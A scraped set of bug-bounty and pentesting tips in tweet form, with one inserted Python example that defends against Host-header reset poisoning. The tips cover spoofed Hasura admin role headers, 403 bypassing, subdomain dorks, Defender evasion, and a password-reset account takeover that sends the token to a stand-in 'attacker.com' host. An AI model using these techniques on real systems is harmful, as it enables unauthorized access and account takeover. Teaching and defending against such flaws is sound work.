Interesting Hasura GraphQL Framework Access Control Issue.
Found an authenticated endpoint "/script"
Added two headers to the existing request:
X-Hasura-Role: admin
X-Hasura-User-Id: 0
Was able to query as admin 😀 #bugbountytip #cybersec #infosec
#bugbountytips
You don't need to write a bash script to fuzz multiple URLs with ffuf, you can simply do
ffuf -w urls.txt:URL -w wordlist:FUZZ -u URL/FUZZ
You can also omit the / if your URL list already has slashes ;)
Automatically Bypass 403 Pages (a ton of methods)
-
This script will test for URL bypasses, to reach a 40X protected page / endpoint.
-
Repo: https://github.com/laluka/bypass-url-parser…
-
Creator:
A decade ago, when I started studying Information Technology seriously, I never thought I'd actually get into cybersecurity. I now have 4x as many kids, more facial hair, & more weight... but I also have my OSCP. #itsnevertoolate
From now until 28/11/2022 23:59:59 UTC there is 37.33% off our membership!
Test your knowledge on our realistic web application "BARKER" which currently contains 170 vulnerabilities based on real findings from
In Android penetration testing, during the static analysis process, you can find some awesome hardcoded secrets/keys. Here are the keywords I've used most, and I found some great keys
👇👇 #BugBounty #bugbountytips #bugbountytip #bugbounty
Amazing evasion standoff between Windows 11 Defender and Windows 10 Defender. As one would expect Win 11 is far superior, but there's always something you can do to bypass detection 😉👇 #pentesting #redteaming #offensivesecurity
You can find deep domains without tools, like these simple dorks: 🙃
site:*.site.com -www
site:*.*.site.com -www
site:*.*.*.site.com -www
#infosec #bugbountytip #cybersecuritytips
Easy | Rare Account Takeover
1. Capture Password Reset request in Burp
2. Change the Host header to HOST: http://attacker.com
3. Victim triggers the Pw Reset link, Token will be captured in logs
4. Change the victim's password using the captured token.
#BugBountyTips #Infosec
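A defender's view of the password reset steps above, as an added example that is not part of the original post: the takeover only works when the application builds the reset link from the request's Host header, so the fix is to validate that header and build the link from configuration. The origin, allowlist and function names below are assumptions made up for this sketch.

```python
from urllib.parse import urlsplit

# Assumed deployment values (constructed for this example).
CANONICAL_ORIGIN = "https://app.example.com"
ALLOWED_HOSTS = {"app.example.com", "www.example.com"}


def reset_link_vulnerable(headers, token):
    """Weak pattern: the emailed link's host comes straight from the request."""
    host = headers.get("Host", "")
    return f"https://{host}/reset?token={token}"


def normalize_host(raw):
    """Return the lowercase hostname from a Host header value, or None."""
    # A Host value is host[:port]; schemes, paths, userinfo and whitespace
    # have no place in it and are rejected outright.
    if not raw or any(c in raw for c in " \t\r\n/@\\"):
        return None
    try:
        parts = urlsplit("//" + raw)
        parts.port  # raises ValueError on a non-numeric or out-of-range port
    except ValueError:
        return None
    return parts.hostname


def reset_link_hardened(headers, token):
    """Reject unknown hosts and always build the link from configuration."""
    # X-Forwarded-Host and similar headers are deliberately never consulted.
    host = normalize_host(headers.get("Host"))
    if host is None or host not in ALLOWED_HOSTS:
        raise ValueError("untrusted Host header")
    return f"{CANONICAL_ORIGIN}/reset?token={token}"


if __name__ == "__main__":
    # Constructed request headers; "attacker.example" is a placeholder host.
    spoofed = {"Host": "attacker.example"}
    print(reset_link_vulnerable(spoofed, "TOKEN"))
    try:
        reset_link_hardened(spoofed, "TOKEN")
    except ValueError as exc:
        print("rejected:", exc)
```

Rejected requests are worth logging: a password reset request with an unexpected Host value is a useful detection signal.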
private window
- Make sure proxy is configured (e.g., Burp Suite)
- Go out for a coffee and when you will be back ...
#infosec #cybersecuritytips #bugbountytip
Doing internet scanning research?
I have a list of IP ranges owned by top cloud providers: AWS, Azure, GCP, GoDaddy, Linode, Rackspace.
All ready for internet research with masscan!
https://github.com/pry0cc/cloud-ranges…